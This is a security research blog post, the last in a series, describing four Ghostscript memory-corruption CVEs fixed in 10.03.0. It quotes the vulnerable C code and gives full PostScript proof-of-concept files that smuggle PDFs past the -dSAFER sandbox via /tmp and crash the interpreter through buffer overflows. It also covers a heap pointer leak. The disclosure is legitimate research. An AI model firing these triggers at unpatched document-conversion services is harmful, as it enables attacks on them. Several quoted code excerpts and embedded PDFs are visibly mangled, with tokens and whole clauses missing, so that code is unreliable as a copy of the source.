Ghostscript wrap-up: overflowing buffers

This is an overview of CVE-2024-29506, CVE-2024-29507, CVE-2024-29508, and CVE-2024-29509. A set of memory-corruption-related vulnerabilities in Ghostscript ≤ 10.02.1. These are all the remaining bugs from our research which we did not end up using in an exploit. Some may be exploitable but this depends on whether Ghostscript is compiled with hardening countermeasures.

These vulnerabilities impact web-applications and other services offering document conversion and preview functionalities as these often use Ghostscript under the hood. We recommend verifying whether your solution (indirectly) makes use of Ghostscript and if so, update it to the latest version.

_This is the final part of a three-part series on Ghostscript bugs._

The research for the CVEs in this post was performed by @b0n0b0__, Giorgio and Thomas.

In addition to PostScript files, Ghostscript can also read and interpret PDF files. To do this it used to invoke a PDF interpreter written in PostScript, but recently (as of 9.56.1) the interpreter has been ported to C, separating it from the PostScript interpreter. This switch prevents issues like _ghost in the pdf_, a trick allowing one to embed PostScript code inside a PDF, which would be executed by Ghostscript when rendering the PDF.

However, the new C-based interpreter also opens up a new attack surface. As it turns out, this is not just a potential problem with malicious PDF files: it is also (by design) possible to invoke the new PDF interpreter from within PostScript. In essence you can “smuggle” a PDF inside a PostScript file (we could call this _pdf in the post_). This gives a much more powerful basis to explore the PDF interpreter’s attack surface from, as potential exploits can use PostScript to perform runtime calculations, dynamically generate a payload or trigger the PDF interpreter multiple times.

`-dSAFERsandbox inside which it is normally executed by Ghostscript.`

The Ghostscript documentation details a set of operators for interfacing with the PDF interpreter, including the straightforward `runpdf`:

“`
runpdf – Called from the modified PostScript run operator (which copies stdin to a temp file if required). Checks for PDF collections, processes all requested pages.
“`

As documented it expects a “ object. If we have a PDF file’s contents as a byte-string in PostScript, we have to write it to a file first. Luckily, as explored in part one, this can be done inside the `-dSAFER` sandbox by writing to `/tmp/`:

`%ram%prefix instead of a path to a file in` `/tmp/. Similarly to` `%pipe%, it results in a pseudo-file which can be read from and written to. These “files” are kept in memory during a PostScript file’s execution, allowing for an easy way to refer to data as a file object, without actually writing to disk. Unlike` `%pipe%, this is not harmful by itself and hence allowed in the` `-dSAFERsandbox.`

Now we can pass arbitrary PDF data to the interpreter from within PostScript, but it gets even better: we can also configure the PDF interpreter from within PostScript!

The PDF interpreter supports various flags and parameters to tweak its behavior. You’ll usually see these being passed via the command-line when the PDF interpreter is invoked directly. However, in case of `runpdf`, these parameters are taken from the current PostScript dictionary (think of these as global variables).

As we’ll see in this post, it turns out that validation of several of these parameters is flawed or nonexistent, maybe because they are considered more “trusted” as they’re usually command-line arguments. Vulnerabilities CVE-2024-29509, CVE-2024-29506 and CVE-2024-29507 are all examples of this: memory corruption bugs that can be triggered from PostScript by invoking the PDF interpreter.

A PDF feature you might be familiar with is _password protection_. A feature allowing a PDF creator to lock (parts of) the document behind a password. This involves both relatively weak protections (relying on the PDF viewer to block certain operations) and actual encryption of data. Several different schemes are defined for this in the PDF standard, determining the algorithm used under the hood.

When the Ghostscript PDF interpreter encounters an encrypted document, it will attempt to use the string parameter `PDFPassword` as a password to unlock the document. In case the document uses encryption variant `R5`, the function `check_password_R5(…)` is called:

“`
static int check_password_R5(pdf_context *ctx, char *Password, int PasswordLen, int KeyLen) { int code; if (PasswordLen != 0) { pdf_string *P = NULL, *P_UTF8 = NULL; code = check_user_password_R5(ctx, Password, PasswordLen, KeyLen); if (code >= 0) return 0; code = check_owner_password_R5(ctx, Password, PasswordLen, KeyLen); if (code >= 0) return 0; /* If the supplied Password fails as the user *and* owner password, maybe its in * the locale, not UTF-8, try converting to UTF-8 */ code = pdfi_object_alloc(ctx, PDF_STRING, strlen(ctx->encryption.Password), (pdf_obj **)&P); if (code data, Password, PasswordLen); pdfi_countup(P); code = locale_to_utf8(ctx, P, &P_UTF8); if (code data, P_UTF8->length, KeyLen); if (code >= 0) { pdfi_countdown(P); pdfi_countdown(P_UTF8); return code; } code = check_owner_password_R5(ctx, (char *)P_UTF8->data, P_UTF8->length, KeyLen); pdfi_countdown(P); pdfi_countdown(P_UTF8); if (code >= 0) return code; } code = check_user_password_R5(ctx, (char *)””, 0, KeyLen); if (code >= 0) return 0; return check_owner_password_R5(ctx, (char *)””, 0, KeyLen); }
“`

As explained by the comment, the supplied password is converted to UTF-8 for a second attempt in case it is not initially correct (due to encoding differences). Before the `locale_to_utf8(…) ` invocation, the password is `memcpy`‘d into a newly allocated buffer. This code contains a sneaky bug however: the number of bytes allocated is `strlen(ctx->encryption.Password)`, while the number of bytes copied is `PasswordLen`. The latter is the size of the `PDFPassword` PostScript string. Notably, PostScript strings are dissimilar to C-strings in that they can contain null-bytes (their size is stored separately). In contrast, `strlen` determines the string’s length by the position of the first null-byte it encounters. This results in a buffer that is potentially too small for the data that is copied into it, and hence a buffer overflow.

Let’s look at a concrete example ( `00` encodes a null-byte in PostScript):

“`
/PDFPassword (hello00world) def
“`

This is a PostScript string of length 11, but `strlen` will consider it to have a length of 5. So, this means the `memcpy` looks like this:

“`
// char[5] “hello00world” 11 memcpy(P->data, Password, PasswordLen);
“`

Here’s a full PostScript example triggering this bug:

“`
% Simple PDF with R5 encryption. % This is not a very valid PDF but we only need to reach the decryption logic /Payload (%PDF-1.7 1 0 obj > >> /Filter /Standard /Length 256 /O /OE /P -1028 /Perms /R 5 /StmF /StdCF /StrF /StdCF /U /UE /V 5 >> endobj xref 0 1 0000000000 65535 f 0000000009 00000 n trailer > startxref 0) def % Write the PDF data to a temporary file /OutFile (/tmp/out) (w) file def OutFile Payload writestring OutFile closefile % Set the PDFPassword to a buffer whose length is larger than its strlen /PDFPassword (hello00BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB) def % Run the PDF interpreter on the file (/tmp/out) (r) file runpdf showpage quit
“`

“`
$ ghostscript -dNODISPLAY 1.ps GPL Ghostscript 10.02.0 (2023-09-13) Copyright (C) 2023 Artifex Software, Inc. All rights reserved. This software is supplied under the GNU AGPLv3 and comes with NO WARRANTY: see the file COPYING for details. zsh: segmentation fault (core dumped) ghostscript -dNODISPLAY 1.ps
“`

This vulnerability was fixed in Ghostscript 10.03.0, specifically in this commit.

This one is quite straightforward. The boolean `PDFDEBUG` parameter (controlling the value of `ctx->args.pdfdebug`) can be set to enable printing of verbose logging information during the PDF parsing process. The function `pdfi_apply_filter` contains an instance of this:

“`
static int pdfi_apply_filter(pdf_context *ctx, pdf_dict *dict, pdf_name *n, pdf_dict *decode, stream *source, stream **new_stream, bool inline_image) { int code; if (ctx->args.pdfdebug) { char str[100]; memcpy(str, (const char *)n->data, n->length); str[n->length] = ‘’; dmprintf1(ctx->memory, “FILTER NAME:%sn”, str); } // … … }
“`

This is a classic stack buffer overflow: if `n->length` is larger than 100, the `str` buffer will overflow, and `memcpy` will continue copying data onto other elements of the stack.

In this case, the originating buffer `n->data` comes from the PDF itself. To trigger the bug we make a PDF containing a long filter name:

“`
% Simple PDF with a long (>100) filter name /Payload (%PDF-1.7 1 0 obj > ] /Type /Pages >> /Type /Catalog >> endobj 2 0 obj > stream a endstream endobj xref trailer > startxref 0) def % Write the PDF data to a temporary file /OutFile (/tmp/out) (w) file def OutFile Payload writestring OutFile closefile % Enable PDFDEBUG /PDFDEBUG true def % Run the PDF interpreter on the file (/tmp/out) (r) file runpdf showpage quit
“`

“`
$ ghostscript -dNODISPLAY 2.ps GPL Ghostscript 10.02.0 (2023-09-13) Copyright (C) 2023 Artifex Software, Inc. All rights reserved. This software is supplied under the GNU AGPLv3 and comes with NO WARRANTY: see the file COPYING for details. … … *** buffer overflow detected ***: terminated zsh: IOT instruction (core dumped) ghostscript -dNODISPLAY 2.ps
“`

This vulnerability was fixed in Ghostscript 10.03.0, specifically in this commit.

These are two more stack buffer overflows, both in the PDF interpreter’s font substitution logic ( `pdfi_open_CIDFont_substitute_file(…)`). This logic allows you to configure a font that replaces certain fonts that may be used in the PDF. As part of this, the parameters `CIDFSubstPath` and `CIDFSubstFont` are temporarily copied into a stack buffer of a fixed size (4096 bytes). However, in both cases, their length is not checked before the `memcpy`, resulting in overflows when the parameters are larger than the buffer:

“`
char fontfname[gp_file_name_sizeof]; // 4096 // … … if (ctx->args.cidfsubstpath.data == NULL) { memcpy(fontfname, fsprefix, fsprefixlen); } else { memcpy(fontfname, ctx->args.cidfsubstpath.data, ctx->args.cidfsubstpath.size); fsprefixlen = ctx->args.cidfsubstpath.size; } if (ctx->args.cidfsubstfont.data == NULL) { // … … } else { memcpy(fontfname, ctx->args.cidfsubstfont.data, ctx->args.cidfsubstfont.size); defcidfallacklen = ctx->args.cidfsubstfont.size; }
“`

To trigger this bug, we construct a PDF that contains a font definition to make sure the substitution logic is invoked (specifically, `/Subtype /Type0` to trigger the right code path), and we set `CIDFSubstPath` (or `CIDFSubstFont`) to a very long string:

“`
% Simple PDF with a Type0 font /Payload (%PDF-1.4 1 0 obj > ] >> >> >> /Contents 2 0 R >>] /Count 1 >> >> endobj 2 0 obj > stream /F1 1 Tf endstream endobj xref trailer > startxref 0) def % Write the PDF data to a temporary file /OutFile (/tmp/out) (w) file def OutFile Payload writestring OutFile closefile % Set the payload to a very long string. % For brevity, we use `string` to produce a bunch of null bytes /CIDFSubstPath 9999 string def % Run the PDF interpreter on the file (/tmp/out) (r) file runpdf showpage quit
“`

“`
$ ghostscript -dNODISPLAY 3.ps GPL Ghostscript 10.02.0 (2023-09-13) Copyright (C) 2023 Artifex Software, Inc. All rights reserved. This software is supplied under the GNU AGPLv3 and comes with NO WARRANTY: see the file COPYING for details. Processing pages 1 through 1. Page 1 *** buffer overflow detected ***: terminated zsh: IOT instruction (core dumped) ghostscript -dNODISPLAY 3.ps
“`

This vulnerability was fixed in Ghostscript 10.03.0, specifically in this commit.

Last but not least, a somewhat unrelated bug. This is not a buffer overflow, but a heap pointer leak. It also does not involve the PDF interpreter, but instead it relates to the PDF output logic (the `pdfwrite` device).

This vulnerability is not as much of a problem by itself as the others in this post, but it may be a useful primitive in a larger exploit. Being able to obtain the memory address of a known object on the heap will indirectly reveal the location of other objects on the heap (modulo some unpredictability). Hence, this is a partial ASLR bypass.

The function `pdf_base_font_alloc` used by the `pdfwrite` device prepares font information for inclusion in an output PDF file. In cases where a font has no given name, it will use a hexadecimal pointer representation ( `”.F” PRI_INTPTR` → `”.F0x%p”`) for the constructed `BaseFont` object’s name:

“`
if (pfname->size > 0) { font_name.data = pfname->chars; font_name.size = pfname->size; while (pdf_has_subset_prefix(font_name.data, font_name.size)) { /* Strip off an existing subset prefix. */ font_name.data += SUBSET_PREFIX_SIZE; font_name.size -= SUBSET_PREFIX_SIZE; } } else { gs_snprintf(fnbuf, sizeof(fnbuf), “.F” PRI_INTPTR, (intptr_t)copied); font_name.data = (byte *)fnbuf; font_name.size = strlen(fnbuf); }
“`

Resulting in, for example:

“`